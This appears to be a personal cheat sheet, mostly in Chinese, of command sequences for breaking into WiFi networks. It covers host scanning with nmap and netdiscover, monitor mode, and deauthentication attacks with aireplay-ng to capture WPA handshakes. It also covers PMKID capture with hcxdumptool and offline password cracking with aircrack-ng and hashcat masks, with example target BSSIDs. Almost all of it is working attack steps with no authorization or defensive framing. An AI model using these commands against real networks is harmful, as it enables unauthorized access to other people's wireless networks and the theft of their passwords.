发现局域网中的路由器设备

netdiscover -r 192.168.1.1/24 -PN

sudo apt-get update
sudo apt-get install netdiscover

# 不如 netdiscover 显示清晰
# -sn (No port scan) host侦测之后，不要再进行端口扫描（非常耗时）
# 用这个命令来找到网络中的主机，而不引起太多注意。
nmap -sn 192.168.1.0/24

# 可以探测OS版本（部分识别，windows基本能认出来）
# -O (Enable OS detection) Enables OS detection
nmap -v -O 192.168.1.101


# mint 19.1 无法认出来： Too many fingerprints match this host to give specific OS details.
# 使用如下命令，能在fingerprint看到 pc-linux-gnu 字样。
nmap -O -sV -T4 -d <target>

sudo apt-get update
sudo apt-get install nmap

arp-scan --interface=eth0 --localnet

# 查看无线网卡接口名称，一般是 wlan0 ，或 wlan0mon
iwconfig

# put the wireless interface into monitor mode
airmon-ng start wlan0mon

# dump 中找到可能的目标wifi，ESSID 一列一般显示 <length: 数字>
# 记录下 BSSID 和 CH（channel）
airodump-ng wlan0mon

# airodump 针对 刚刚找到的 BSSID 为目标
# 例如，BSSID = BC:F6:85:BF:4F:70 ， CH = 7
airodump-ng -c 7 --bssid BC:F6:85:BF:4F:70 -w psk wlan0mon

# 另外打开一个 terminal 窗口，执行如下命令，让已经连接的设备端口重连，
# 就能获取 ESSID 信息啦（回到airodump 的terminal 去看）
# -0 = Attack mode 30= de-authentication (The number of deauth packets.) 
# -a = Target access point mac address 
# 
aireplay-ng -0 30 -a BC:F6:85:BF:4F:70 wlan0mon

# 安装工具
apt install -y hcxdumptool hcxtools hashcat

# wlan0 进入 monitor 模式
airmon-ng check kill
airmon-ng start wlan0mon

# Kill the wpa_supplicant for wlan0
wpa_cli terminate wlan0

# Use Airodump-ng to sniff nearby networks
airodump-ng --ivs wlan0

# 嗅探到的目标BSSID加入到filter.txt 中
## Create the filtermode file and enter the targets BSSID 
## Target BSSID 84:C9:B2:6A:9E:90 ESSID HonnyP01 Chanel 1
## "echo "BSSID">filter.txt"
sudo echo "84C9B26A9E90">filter.txt

# 运行 Hcxdumptool 获取目标的 PMKID，至少运行10分钟
# If an AP receives the association request packet and supports sending PMKID you will see a message “FOUND PMKID”
hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

# 使用 hcxpcaptool 将 pcapng 文件转换供 hashcat 随后处理
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

# Crack the formated pcapng with hashcat
./hashcat -m 16800 cap01.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

# 看下是 Managed 还是 monitor 模式
iwconfig

# 从Managed 模式，转为 monitor
# 可能不成功，按提示，可能要kill掉一些进程后重试，执行：
# airmon-ng check kill
airmon-ng start wlan0mon
# 或者，airmon-ng start wlan0** ，不太确定

# 开始搜索周围wifi信息，保存搜索日志到当前目录 wifis 前缀的文件中
# -M ： 打印 Manufacture信息
# 从中找到目标wifi等BSSID，例如，78:11:DC:10:4F:66
airodump-ng wlan0 -w wifis -M

# airodump 针对 刚刚找到的 BSSID 为目标
# 例如，BSSID = 78:11:DC:10:4F:66 ， CH = 7
# 从结果中找到 STATION 的 MAC 地址，例如：6C:88:14:F2:47:8C
airodump-ng -c 7 --bssid 78:11:DC:10:4F:66 -w psk wlan0mon

# 【另开一个terminal】
# 用 aireplay-ng 让目标Station断线重连，
# 在 airodump-ng 的terminal 窗口就能捕获 "WPA handshake"
# 在磁盘中找到对应的 cap 数据包，接下来用 aircrack-ng 或者 hashcat进行离线破解
aireplay-ng -0 20 -c 6C:88:14:F2:47:8C -a 78:11:DC:10:4F:66 wlan0mon

# 无线网卡退出 Monitor 模式
airmon-ng stop wlan0mon

aircrack-ng -w [字典-path] [破解的目标握手包-path]

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password. The * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap

# 将cap转换为hccap格式（老的格式，hashcat 4.0 之前）
aircrack-ng input.cap -J output.hccap

# -----------

# use cap2hccapx from hashcat-utils to convert .cap files to .hccapx files
# Downloading and Compiling the cap2hccapx Utility
wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c
# 或 wget http://stuffjasondoes.com/tools/cap2hccapx.c

gcc -o cap2hccapx cap2hccapx.c

mv cap2hccapx /bin
rm cap2hccapx.c

cap2hccapx capture-01.cap capturefile-01.hccapx

hashcat -m 2400 -a 3 hash文件 ?1?1?1?1?1?1?1?1 --increment -1 ?l?d?u
# 或
hashcat-cli32.exe -m 0 <hashes.txt> -a  3  ?1?1?1?1?1?1?1?2  -1 ?l?u -2?d

# -m hash-type, 2400 对应 WPA2

# -a
# 0 = Straight
# 1 = Combination
# 3 = Brute-force 暴力破解
# 6 = Hybrid dict + mask
# 7 = Hybrid mask + dict

# ?1?1?1?1?1?1?1?1
# 8 times a sign definend in custom charset 1

# --increment
# -Enable increment mode. Otherwise only passworts with length 8 would be checked. remebmer ?1?1?1?1?1?1?1?1
#       
# (also available: --increment-min=NUM   --increment-max=NUM)

# -1 ?l?d?u
# defined characterset #1 (used for all positions in this example)

# predefined charsets
#   ?l = abcdefghijklmnopqrstuvwxyz
#   ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
#   ?d = 0123456789
#   ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
#   ?a = ?l?u?d?s
#   ?b = 0x00 - 0xff

# ?l?d?u is the same as 
# ?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789